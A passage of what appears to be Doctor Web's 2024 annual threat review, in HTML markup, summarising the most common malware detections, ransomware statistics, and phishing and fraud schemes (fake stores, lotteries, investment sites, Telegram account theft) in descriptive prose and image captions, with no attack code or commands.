        The number of unique threats increased by 51.22%. Among the most common malicious programs were trojans created in the AutoIt scripting language. 
        They are distributed as part of other malware and are designed to make the latter more difficult to detect. Moreover, users encountered various malicious scripts and adware trojans.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/01_stat_2024_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/01_stat_2024_en.png" alt="stat_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=JS.Siggen5.44590&amp;lng=en"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
        &lt;dd&gt;Malicious code added to the es5-ext-main public JavaScript library. It shows a specific message if the package is installed on a server with the time zone of Russian cities.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1224&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1131&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1124&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1222&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for packed versions of the &lt;a href="https://vms.drweb.com/search/?q=Trojan.AutoIt.289&amp;lng=en"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; malicious app that are written in the AutoIt scripting language. This trojan is distributed as part of a group of several malicious applications, including a miner, a backdoor, and a self-propagating module. &lt;a href="https://vms.drweb.com/search/?q=Trojan.AutoIt.289&amp;lng=en"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; performs various malicious actions that make it difficult for the main payload to be detected.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.StartPage1.62722&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A malicious program that can modify the home page in the browser settings.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.BPlug.3814&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for malicious components of the WinSafe browser extension. These components are JavaScript files that display intrusive ads in browsers.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;VBS.KeySender.6&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A malicious script that, in an infinite loop, searches for windows containing the text &lt;span class="string"&gt;mode extensions&lt;/span&gt;, &lt;span class="string"&gt;разработчика&lt;/span&gt; and &lt;span class="string"&gt;розробника&lt;/span&gt; and sends them an Escape key press event, forcibly closing them.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;BAT.AVKill.37&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A component of the &lt;a href="https://vms.drweb.com/search/?q=Trojan.AutoIt.289&amp;lng=en"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; malicious program. This script launches other malware components, sets them to autorun via Windows Task Scheduler, and also adds them to Windows Defender’s anti-virus exceptions.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.Unsecure.7&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A trojan that blocks the launch of anti-viruses and other software through AppLocker policies in the Windows operating system.&lt;/dd&gt;
    &lt;/dl&gt;

    &lt;p&gt;
        As for email threats, the most widespread were various malicious scripts and all kinds of trojans, including backdoors, 
        malware downloaders and droppers, trojans with spyware functionality, malicious cryptocurrency miners, and others. 
        Threat actors also distributed phishing documents, often fake login forms mimicking those on popular websites. 
        Additionally, users encountered worms and malicious apps that exploit vulnerabilities in Microsoft Office documents.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/02_email_traffic_2024_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/02_email_traffic_2024_en.png" alt="mail_traffic_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=JS.Siggen5.44590&amp;lng=en"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
        &lt;dd&gt;Malicious code added to the es5-ext-main public JavaScript library. It shows a specific message if the package is installed on a server with the time zone of Russian cities.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;JS.Inject&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A family of malicious JavaScripts that inject a malicious script into the HTML code of webpages.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;LNK.Starter.56&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for a shortcut that is crafted in a specific way. This shortcut is distributed through removable media, like USB flash drives. To mislead users and conceal its activities, it has a default icon of a disk. When launched, it executes malicious VBS scripts from a hidden directory located on the same drive as the shortcut itself.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Win32.HLLW.Rendoc.3&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A network worm that spreads via removable storage media and other channels.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Exploit.CVE-2018-0798.4&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;An exploit designed to take advantage of Microsoft Office software vulnerabilities so that an attacker can run arbitrary code.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1122&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for a packed version of the &lt;a href="https://vms.drweb.com/search/?q=Trojan.AutoIt.289&amp;lng=en"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; malicious app that is written in the AutoIt scripting language. This trojan is distributed as part of a group of several malicious applications, including a miner, a backdoor, and a self-propagating module. &lt;a href="https://vms.drweb.com/search/?q=Trojan.AutoIt.289&amp;lng=en"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; performs various malicious actions that make it difficult for the main payload to be detected.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.SpyBot.699&amp;lng=en"&gt;&lt;b&gt;Trojan.SpyBot.699&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
        &lt;dd&gt;A multi-module banking trojan. It allows cybercriminals to download and launch various applications on infected devices and run arbitrary code.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;VBS.BtcMine.13&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;b&gt;VBS.BtcMine.12&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A VBS script designed to covertly mine cryptocurrencies.&lt;/dd&gt;
    &lt;/dl&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="encruptor"&gt;
    &lt;h2 class="alignCenter"&gt;Encryption ransomware&lt;/h2&gt;
    &lt;p&gt;
        Compared with 2023, in 2024, Doctor Web’s technical support service registered 33.05% fewer user requests to decrypt 
        files affected by encryption trojans. The dynamics of when those requests were registered is shown in the graph below:
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/03_encoder_requests_14_2024_en.1.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/03_encoder_requests_14_2024_en.1.png" alt="encoders_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;The most common encoders of 2024:&lt;/p&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; (13.13% of user requests)&lt;/dt&gt;
        &lt;dd&gt;An encoder trojan also known as Mimic. It uses the everything.dll library from the legitimate software Everything, which is designed to instantly locate files on Windows computers.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.3953&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.3953&lt;/b&gt;&lt;/a&gt; (12.10% of user requests)&lt;/dt&gt;
        &lt;dd&gt;An encoder trojan that has several versions and modifications. It uses the AES-256 algorithm in CBS mode to encrypt files.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.26996&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.26996&lt;/b&gt;&lt;/a&gt; (7.44% of user requests)&lt;/dt&gt;
        &lt;dd&gt;A trojan encoder known as STOP Ransomware. It attempts to obtain a private key from a server. If unsuccessful, it uses the hardcoded one. It uses Salsa20 stream cipher to encrypt files.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35067&lt;/b&gt; (2.21% of user requests)&lt;/dt&gt;
        &lt;dd&gt;An encoder trojan also known as Macop (&lt;b&gt;Trojan.Encoder.30572&lt;/b&gt; is one of its other variants). It has a small size, about 30-40 Kbytes. This is partially due to the fact that the trojan does not carry third-party cryptographic libraries and uses exclusively CryptoAPI functions for encryption and key generation. It uses the AES-256 algorithm to encrypt files, and the keys themselves are encrypted with RSA-1024.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.Encoder.37369&lt;/b&gt; (2.10% of user requests)&lt;/dt&gt;
        &lt;dd&gt;One of many modifications of #Cylance ransomware. To encrypt files, it uses the ChaCha12 algorithm with the Curve25519 (X25519) elliptic curve key exchange scheme.&lt;/dd&gt;
    &lt;/dl&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="netfraud"&gt;
    &lt;h2 class="alignCenter"&gt;Network fraud&lt;/h2&gt;
    &lt;p&gt;
        Over the course of 2024, Doctor Web’s Internet analysts observed high activity on the part of cyber fraudsters 
        using both traditional and new scenarios to deceive users. In the Russian segment of the Internet, the most 
        widespread schemes were again those using fraudulent sites of multiple formats. Some of them were fake sites 
        of online stores and social networks with promotions and prize draws allegedly sponsored by them. Potential 
        victims always “win” on such websites, but to get their nonexistent prize, they are asked to pay a “commission”.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/04_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/04_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A fraudulent site, allegedly related to a Russian online store, offers the visitor the chance to participate in a nonexistent prize draw&lt;/em&gt;&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/05_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/05_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A fake social network website offers the chance to “try your luck” and win large cash prizes or other gifts&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        One of the current variants of such a scheme is not new: using fake websites of retailers and household appliance and electronics stores to offer 
        users the opportunity to buy goods at a discount. On such sites, potential victims are typically asked to pay for their “orders” with a bank card. 
        But last year, fraudsters started resorting to the Faster Payment System.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/06_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/06_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A fake website of a household appliance and electronics store promises potential victims big discounts&lt;/em&gt;&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/07_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/07_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A fraudulent site offers visitors the option to use the Faster Payment System as one way to pay for their “order”&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        The scheme involving “free” lottery tickets also remained popular. Lottery draws, allegedly performed online, always end in “winnings” for potential victims. 
        To get their prize, users also have to pay a “commission”.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/08_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/08_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;This user has supposedly won 314,904 rubles in the lottery, and to “get” their prize, they need to pay a “commission”&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Scammers also kept fake finance-themed websites in their arsenal. Popular were such topics as receiving some payments from the government or private companies, 
        investing in the oil and gas sector, financial literacy training, trading stocks with the help of “unique” automated systems or “verified” strategies that 
        supposedly guarantee income, and others. Threat actors engaged in strategies that included exploiting the names of media personalities to attract users’ attention. 
        Examples of such sites are shown below.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/09_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/09_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A fraudulent site offers visitors the chance to “make up to 10,000 euros per month on the unique WhatsApp platform”&lt;/em&gt;&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/10_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/10_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Russian singer Shaman “shared a secret platform for success” that allegedly can generate an income of $14,000 per month&lt;/em&gt;&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/11_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/11_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;The fake site of an oil and gas company offers access to an investment service and promises income starting at 150,000 rubles&lt;/em&gt;&lt;/p&gt;

    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
          &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/14_fraud_2024.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/14_fraud_2024.1.png" alt="netfraud_2024"&gt;
          &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
          &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/13_fraud_2024.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/13_fraud_2024.1.png" alt="netfraud_2024"&gt;
          &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Fraudulent sites that imitate real bank investing services&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Meanwhile, our specialists detected new schemes. For example, scammers, allegedly on behalf of large companies, 
        offered users a reward for participating in service-quality surveys. Such fakes included fictitious websites of 
        credit organizations. On these, users were asked to provide sensitive personal information that could include their 
        full name, the mobile phone number linked with their bank account, and their bank card number.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/15_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/15_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A fake bank website offers a reward of 6,000 rubles for participating in a survey on “improving service quality”&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        At the same time, such fakes also affected users in other countries. For instance, the site shown below assured European users that they will get dividends 
        for investing in promising sectors of the economy:
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/16_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/16_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;
        And this site advertised a “new investing platform from Google” that could allegedly help users make money, starting at €1000:
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/17_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/17_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;
        Another fraudulent Internet resource offered Slovak users the opportunity to “make more than $192,460 per month” with the help of some investing service:
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/18_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/18_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;
        Users from Azerbaijan allegedly could also significantly improve their financial situation, making from 1000 manat per month. 
        All they had to do was participate in a short survey and get access to the service, which was supposedly related to an Azerbaijani oil and gas company:
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/19_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/19_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;
        At the end of the year, fraudsters held to tradition and began adapting these fake websites to the New Year holiday theme. 
        The next fake Internet resource of a crypto exchange, for example, promised Russian users New Year payments:
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/20_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/20_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;
        Another site offered users holiday payments supposedly on behalf of an investing company:
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/21_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/21_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;
        And this fraudulent Internet resource promised users from Kazakhstan large payments in honor of Independence Day as part of a “New Year offer”: 
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/22_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/22_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;
        Throughout the year, our Internet analysts detected other phishing sites as well. Among them were fake websites of online education services. 
        One, for instance, simulated the appearance of a genuine site and offered programming courses. To “receive a consultation”, users were asked to provide their personal data.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/23_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/23_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A fake website that was disguised as a real online resource of an online education service&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Additionally, attempts to steal Telegram user accounts continued. For this, fraudsters used phishing websites camouflaged as various online voting platforms. 
        Among these, sites asking visitors to “vote in children’s drawing competitions” were widespread again. Potential victims are asked to provide their mobile phone 
        number to receive a one-time code. However, when they enter this code on such a website, users are giving scammers access to their accounts.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/24_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/24_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A phishing website for “voting” in an online children’s drawing competition&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        On other similar sites, potential victims were offered a “free” subscription to a Telegram Premium service. 
        Users are asked to log into their account, but the confidential data that they enter there is sent to the 
        cybercriminals who then hijack their accounts. It is noteworthy that the links to these sites are distributed 
        in a variety of ways, including through the messenger itself. And the real address of the target site in such 
        messages often does not match the one that users see.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/25_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/25_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A phishing message in Telegram, in which, in order to “activate” a Telegram Premium subscription, users are asked to follow the given link. The text of this link does not in fact match the target URL&lt;/em&gt;&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/26_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/26_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;The phishing site loaded after the link in the fraudulent message is followed&lt;/em&gt;&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/27_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/27_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;After the user clicks the button on the previous page, the website displays an authorization form that looks like the genuine one&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        To distribute links to fraudulent sites, cybercriminals use email spam, among other avenues. Over the course of last year, our Internet analysts detected many different spam campaigns. 
        They observed the active distribution of phishing emails targeting Japanese users. For example, scammers, allegedly on behalf of some bank, informed potential victims about some purchase 
        and suggested that they view the details of the “payment” by following the provided link. In reality, this link led to a phishing Internet resource.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/28_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/28_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A phishing email, supposedly sent on behalf of a bank and offering Japanese users the option to view the details of a payment&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        In another popular scenario, threat actors, supposedly on behalf of credit organizations, were sending fake notifications containing information about a month’s 
        worth of bank card expenses. At the same time, the links to phishing sites were often concealed and seemed harmless in the email texts.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/29_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/29_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;In the texts of spam emails, users saw the links to real bank web addresses, but when clicked, these addresses led to a fraudulent Internet resource&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        One spam campaign targeted European users. For example, users in Belgium encountered phishing emails that claimed their bank accounts had been “blocked”. 
        To get them “unblocked”, they were asked to follow a link which, in fact, led to the fraudsters’ website.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/30_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/30_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;An unwanted letter threatens a potential victim with a “blocked” bank account&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        We also detected other spam campaigns, for example, those aimed at an English-speaking audience. In one such campaign, 
        potential victims received messages asking them to confirm receipt of a large money transfer. However, the link in these 
        messages led to a phishing online bank authorization form, which resembled the one on the genuine bank’s website.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/31_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/31_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A spam email saying that the user supposedly needs to confirm receipt of $1,218.16 US&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Russian users most often encountered spam letters that helped fraudsters lure potential victims to the phishing websites 
        we covered earlier in this review. Common topics for these unwanted messages were prizes and discounts from online stores, 
        free lottery tickets, and access to investment services. Examples of them are shown in the screenshots below.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/32_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/32_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A letter, allegedly from an online store, offering the chance to participate in a “prize draw”&lt;/em&gt;&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/33_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/33_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A letter, allegedly from a credit organization, offering the chance to “become a successful investor”&lt;/em&gt;&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/34_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/34_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A letter, allegedly sent on behalf of an electronics store, offering a promo code that the recipient can activate to get a discount on goods&lt;/em&gt;&lt;/p&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="formobile"&gt;
    &lt;h2 class="alignCenter"&gt;Mobile devices&lt;/h2&gt;
    &lt;p&gt;
        According to detection statistics collected by Dr.Web Security Space for mobile devices, in 2024, 
        &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; trojans were once again the most common Android malicious programs. They accounted for more than a third of malware detections. 
        Such trojans conceal their presence on infected devices and display ads. Among the most active members of this family were &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3956&lt;/b&gt;, 
